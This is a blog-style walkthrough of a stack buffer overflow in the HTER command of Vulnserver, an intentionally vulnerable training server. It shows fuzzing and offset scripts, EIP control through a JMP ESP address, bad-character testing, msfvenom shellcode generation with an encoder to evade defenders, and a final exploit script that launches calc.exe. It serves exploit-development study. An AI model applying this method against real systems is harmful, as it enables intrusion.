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Vulnserver HTER - EIP Overwrite with Character conversion
- Prologue
- Spiking the Vulnserver
- Analysing the source code
- Fuzzing the server
- Finding Offset
- Overwriting Instruction Pointer
- Finding bad characters
- Redirecting the execution
- Generating shellcode
- Exploitation
This blog post is same as the Vanilla Stack Buffer Overflow
where we overwrote the EIP
to gain code execution, but in this post we will be exploiting a command in Vulnserver which has an interesting code logic in it
Spiking the Vulnserver
Creating a spike script
for spiking using generic_send_tcp
└─$ cat hter.spk
s_string("HTER ");
└─$ generic_send_tcp 9999 hter.spk 0 0
Total Number of Strings is 681
Fuzzing Variable 0:25
Variablesize= 4
Fuzzing Variable 0:26
Variablesize= 5000
Fuzzing Variable 0:27
Variablesize= 5000
Fuzzing Variable 0:28
Variablesize= 5000
Fuzzing Variable 0:29
Variablesize= 5000
Fuzzing Variable 0:30
Variablesize= 2050
While spiking HTER command, we could see that we could not connect to the Vulnserver anymore
Yes.. It got crashed!!
We could see that our Vulnserver application has been terminated by Access Violation error
From this we can confirm that, HTER
command is vulnerable to Buffer Overflow attack
Analysing the source code
} else if (strncmp(RecvBuf, "HTER ", 5) == 0) {
char THBuf[3];
memset(THBuf, 0, 3);
char *HterBuf = malloc((DEFAULT_BUFLEN+1)/2);
memset(HterBuf, 0, (DEFAULT_BUFLEN+1)/2);
i = 6;
k = 0;
while ( (RecvBuf[i]) && (RecvBuf[i+1])) {
memcpy(THBuf, (char *)RecvBuf+i, 2);
//uses strtoul function to convert string into unsigned integer
//string is converted into Base16 character
unsigned long j = strtoul((char *)THBuf, NULL, 16);
memset((char *)HterBuf + k, (byte)j, 1);
i = i + 2;
//vulnerable function
memset(HterBuf, 0, (DEFAULT_BUFLEN+1)/2);
SendResult = send( Client, "HTER RUNNING FINE\n", 18, 0 );
The vulnerable function used by this command is,
void Function4(char *Input) {
char Buffer2S[1000];
strcpy(Buffer2S, Input);
Here the main overflow attack is caused by strcpy
function, where Buffer2S
is only limited for 1000 bytes but the incoming buffer has more data than that causing it to overflow the Buffer2S buffer while copying
This command does not expect any special characters used for validation
Fuzzing the server
We have successfully crashed our server and the payload data begins with HTER
which is made up of 5 bytes
Lets create a python script which generates payload data and fuzzes the payload length to crash the server
└─$ cat fuzzing.py
import socket, sys
from time import sleep
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))
s.send((b"HTER "+payload))
print("Fuzzing crashed at %s bytes"%(len(payload)))
└─$ python3 fuzzing.py
Fuzzing crashed at 3000 bytes
The Vulnserver application should be ran without debugger, to avoid socket connection errors while fuzzing
So, from fuzzing we can estimate that our Vulnserver application is crashing at 3000 bytes
of buffer data
Still, we are not sure about the approximate buffer space data need to create an overflow
Finding Offset
By finding offset, we can locate the approximate buffer space size for writing data into the base pointer and instruction pointer
To find the offset, we need to create a pattern and crash the program
So that the value in the registers can be used to find the offset of it from buffer data
We could not create a random pattern using metasploit
and analyse it, because even though if we create and pass it into the buffer it will get converted into Base16 values by strtoul
Which means our string data will be converted into hex
values, if not matched it produces junk values
Fuzzing with the our own pattern to crash the program,
import socket, sys
# fuzzing with junk data
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))
s.send((b"HTER "+payload))
└─$ python3 offset.py
This will crash the program, where our buffer will get overflowed and fills the Base Pointer and Instruction Pointer with the data from the pattern

Here we can see EIP
hash a data of CCCC
, which is from our payload
Still we need to pass our payloads precisely to hit the EIP
to find its offset
After numerous tries, finally using this script we can overwrite the EBP
and EIP
with our own data
└─$ cat offset.py
import socket, sys
from time import sleep
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))
s.send((b"HTER "+payload))
└─$ python3 offset.py
Now, using the data from the registers we are going to locate the offset in the buffer space to reach the data
We overwrote EBP
and EIP
with B's
and C's
We have to keep in mind that our hex characters are converted into string and stored into these registers
In our payload we used,
"HTER " - 5 bytes
"A"s - 2033 bytes
"B"s and "C"s - 8 bytes
Offset of EBP = 5 + 2033 = 2038 bytes
Offset of EIP = 5 + 2033 + 8 = Offset of EBP + 8 = 2046 bytes
So we should use 5 bytes of HTER
and 2041 bytes of A's
Overwriting Instruction Pointer
Now, we have found the offset of our EIP
It’s time to control the EIP, which is the important phase of every exploitation
Lets craft a script to overwrite the EIP with our own custom data, which will be further used to craft an exploit
└─$ cat control-eip.py
import socket, sys
# to overwrite buffer and EBP
# to overwrite EIP
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))
s.send((b"HTER "+payload))
└─$ python3 control-eip.py
We have successfully overwrote the EIP
with our own data DDDDDDDD

So we could control EIP and redirect the code execution to the next point
We could also see that the ESP
data is behind the EIP

Finding bad characters
Lets fuzz our ESP
memory to see our data dump on that region
└─$ cat fuzz-esp.py
import socket, sys
# to overwrite buffer and EBP
# to overwrite EIP
# to store junk in ESP
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))
s.send((b"HTER "+payload))
└─$ python3 fuzz-esp.py
After fuzzing, we can see our ESP data in the memory dump after EIP

Lets use it to test for bad characters
└─$ cat badchars.py
import socket, sys
# collection of badchars except \x00
# to overwrite buffer and EBP
# to overwrite EIP
# to test badchars in ESP
# padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))
s.send((b"HTER "+payload))
By running this, it seems like everything is not in order and the whole data we passed on ESP seems like it has many junk characters
Modifying our script to test only for HEX
└─$ cat badchars.py
import socket, sys
# adding "ghijklm" for padding
# to overwrite buffer and EBP
# to overwrite EIP
# to test badchars in ESP
# padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))
s.send((b"HTER "+payload))
└─$ python3 badchars.py
After crashing, we can confirm that it is allowing only HEX
values inside ESP

So passing data as raw hex bytes is useless, lets directly pass our raw hex bytes as string and test it this time
Lets create an ASCII string of characters
>>> badchars=[0x00]
>>> fuzz_data = ""
>>> for x in range(1,256):
... if(x not in badchars):
... fuzz_data += bytes([x]).hex()
>>> fuzz_data
Fuzzing for bad characters using this string,
└─$ cat badchars.py
import socket, sys
# string of badchars except 00 (\x00)
# to overwrite buffer and EBP
# to overwrite EIP
# fuzzing badchars on ESP
# padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))
s.send((b"HTER "+payload))
└─$ python3 badchars.py
After crashing we can see the ESP dump to check for bad characters,

Seems like everything is perfect, except null byte
Redirecting the execution
As for now, we can control the EIP
and also we have only one bad character x00
Since we can control EIP, we can use this as our advantage and redirect the code flow to any part of the memory where it is perfect to have shellcode execution
After EIP, we would be having ESP
We know that, we could overflow ESP after EIP
But we don’t have execution, because EIP should be pointed to the address of ESP and the stack should allow execution
To make our shellcode from ESP to execute, we need to jump from the current location to address of ESP
This can be done by jmp esp
, all we have to do is point the EIP with the address of this instruction
Running mona by passing !mona modules
command to list the protection of all modules used by this application

On these, we can clearly see that only two modules
have every security mitigations turned off
From these two, it is always best to try our exploit from an DLL of the own application and not from the actual exe itself
Lets find the jmp esp opcode from the memory of essfunc.dll
To find the opcode using mona, we need the hex value of the opcode which can be done by nasm shell
└─$ locate nasm_shell
└─$ /usr/bin/msf-nasm_shell
nasm > jmp esp
00000000 FFE4 jmp esp
nasm > exit
Finding this offset using mona by the command !mona find -s \xff\xe4 -m essfunc.dll

We could see there are 9 pointers available for this exploit which has jmp esp opcode in it and it also doesn’t change its memory address
Eventhough ASLR
is enabled for other parts, here it is disabled which makes the address to remain static & suitable for exploitation
NX bit
is also disabled, which allows us to execute shellcode on stack memory
Also, while checking the pointer addresses make sure that the address do not contain bad characters in it, which may cause poor exploitation
Lets craft the script and enter the address of the opcode in little endian
format because the data in stack is placed in little endian format
└─$ cat jmp-esp.py
import socket, sys
# to overwrite buffer and EBP
# to overwrite EIP with JMP ESP
payload+=b"AF115062" #"\xaf\x11\x50\x62"
# padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))
s.send((b"HTER "+payload))
└─$ python3 jmp-esp.py
We should place the address in string format instead of raw hex bytes to make it work perfectly
After crashing, we can see that we landed perfectly on ESP memory

So, we have successfully redirected our program flow
Next we have to point it with our shellcode
Generating shellcode
Instead of spawning reverse shell, lets try to pop calculator application this time using our shellcode
Lets generate the shellcode to pop calc.exe
using msfvenom,
└─$ msfvenom -p windows/exec CMD=calc.exe -b '\x00' -f hex
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of hex file: 440 bytes
Creating this shellcode in hex
, since it allow hex characters only
Usage of encoders
while creating shellcode may reduce the risk of getting caught by defenders
Now we have gone through every steps and crafted our final exploit to gain shell on our target machine
By adding nops, we will be performing nop-sled
, which will make the probability for execution of our shellcode higher
The exploit script for this buffer overflow via HTER
command is,
└─$ cat exploit.py
import socket, sys
from time import sleep
# to overwrite buffer and EBP
# to overwrite EIP with JMP ESP
payload+=b"AF115062" #"\xaf\x11\x50\x62"
# NOP sled
# shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))
s.send((b"HTER "+payload))
By running this exploit, we would successfully pop a calculator by executing our shellcode